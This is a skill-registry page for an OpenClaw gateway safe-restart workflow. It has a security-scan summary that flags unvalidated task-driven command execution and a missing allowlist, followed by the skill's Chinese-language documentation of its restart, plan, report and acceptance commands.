Restart Safe Workflow

v1.0.3

Safe OpenClaw gateway restart workflow with doctor precheck, checkpoint, restart-health-resume chain, task continuation, reconcile, and user-visible notifica...

2· 458·4 current·4 all-time
byHuo Lushan@who-ohw
Security Scan
VirusTotalVirusTotal
Benign
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
Name/description (safe restart, precheck, checkpoint, resume) match what the code does: it calls an openclaw CLI, performs doctor/checkpoint/restart/health/resume steps, writes per-task state JSON, and sends notifications. The dependencies (openclaw CLI, python3, bash) are appropriate for this purpose. Minor mismatch: the SKILL recommends a config-action-allowlist.txt but that file is not present in the package manifest.
!
Instruction Scope
The SKILL.md and scripts allow task-driven actions including 'cmd:<command>' and 'script:<path>' which the runtime will execute. The code includes an ACTION_ALLOWLIST_FILE mechanism and mentions a built-in whitelist, but the allowlist file recommended in SKILL.md is not included. If input task data (nextAction) is attacker-controlled or insufficiently validated, arbitrary commands or scripts could run. The scripts do not send data to external HTTP endpoints; visible notifications are sent via the openclaw CLI.
Install Mechanism
No install spec or remote downloads — this is instruction-only with included shell scripts. Nothing is fetched or installed at runtime by the skill itself, which minimizes supply-chain risk.
Credentials
The registry metadata declares no required environment variables, but the scripts make optional use of several env vars (STATE_DIR, ACTION_ALLOWLIST_FILE, NOTIFY_CHANNEL, NOTIFY_TARGET, NOTIFY_ACCOUNT, GATEWAY_RESTART_CMD, etc.). This is proportionate to a restart/notification workflow, but the skill will rely on the local openclaw CLI and whatever credentials/config it uses — those are not declared here. Ensure the openclaw runtime credentials and notify account settings are intentionally configured.
Persistence & Privilege
always=false and the skill does not request permanent platform-wide privileges. It writes state files under STATE_DIR (default ./state/restart) and may spawn detached processes for acceptance runs — this is expected for a detached restart runner. It does not alter other skills' configuration.
What to consider before installing
This skill implements an automated restart-and-resume workflow and will run on-host commands and scripts described in task data (nextAction). Before installing or running: 1) Review and supply a strict ACTION_ALLOWLIST_FILE (the package’s recommended allowlist file is not included) so only safe commands/scripts are permitted. 2) Audit any task files (plan/nextAction inputs) you plan to run to ensure they cannot contain arbitrary 'cmd:' or 'script:' entries from untrusted sources. 3) Ensure the machine's openclaw CLI and its notification/account configuration are secure (the script invokes openclaw message send and gateway/restart/status commands). 4) Run acceptance tests in an isolated environment (or with --no-restart) first to observe behavior. 5) If you need help knowing which commands to allow/deny, ask the skill author for the default allowlist or add a conservative whitelist (only health/status/echo) before enabling real restarts.

Like a lobster shell, security has layers — review code before you run it.

latestvk97crgnwy7pdtb8h2yjc18hb0x828vbj
458downloads
2stars
3versions
Updated 1mo ago
v1.0.3
MIT-0

restart-safe-workflow

能力概览

  • 安全重启主链:doctor -> checkpoint -> restart -> health -> resume
  • 任务续跑:pendingActions + Action 状态机
  • 语义动作:notify-time[:TZ]
  • 计划能力:plan / validate(TaskPlan v1)
  • 补偿与升级:reconcile + retry_exceeded
  • 观测诊断:report --verbose / diagnose
  • 一键验收:restart-acceptance.sh(支持 --with-restart,默认自守护 detached)

常用命令

# 安全重启
scripts/restart-safe.sh run --task-id <id> --next "notify:重启完成;notify-time"

# 计划预览 / 校验
scripts/restart-safe.sh plan --task-id <id> --next "notify:ok;notify-time"
scripts/restart-safe.sh validate --tasks-file examples/plan-valid.json

# 摘要 / 诊断
scripts/restart-safe.sh report --task-id <id>
scripts/restart-safe.sh report --task-id <id> --verbose
scripts/restart-safe.sh diagnose --task-id <id>

# 验收
scripts/restart-acceptance.sh
scripts/restart-acceptance.sh --with-restart --notify-channel feishu --notify-target user:<open_id>

推荐发布内容

  • SKILL.md
  • README.md
  • config-action-allowlist.txt
  • schemas/taskspec-v1.schema.json
  • examples/plan-valid.json, examples/plan-invalid.json
  • scripts/restart-safe.sh, scripts/restart-acceptance.sh
  • references/restart-safe-sop.md
  • references/phase4-rollout-checklist.md

Changelog(最近两次)

  • v1.0.2: 完成 Phase3/4,修复 TC10 升级触发,验收支持自守护 detached。
  • v1.0.1: 完成 Phase1/2,新增 TaskPlan v1 与状态机能力。

Comments

Loading comments...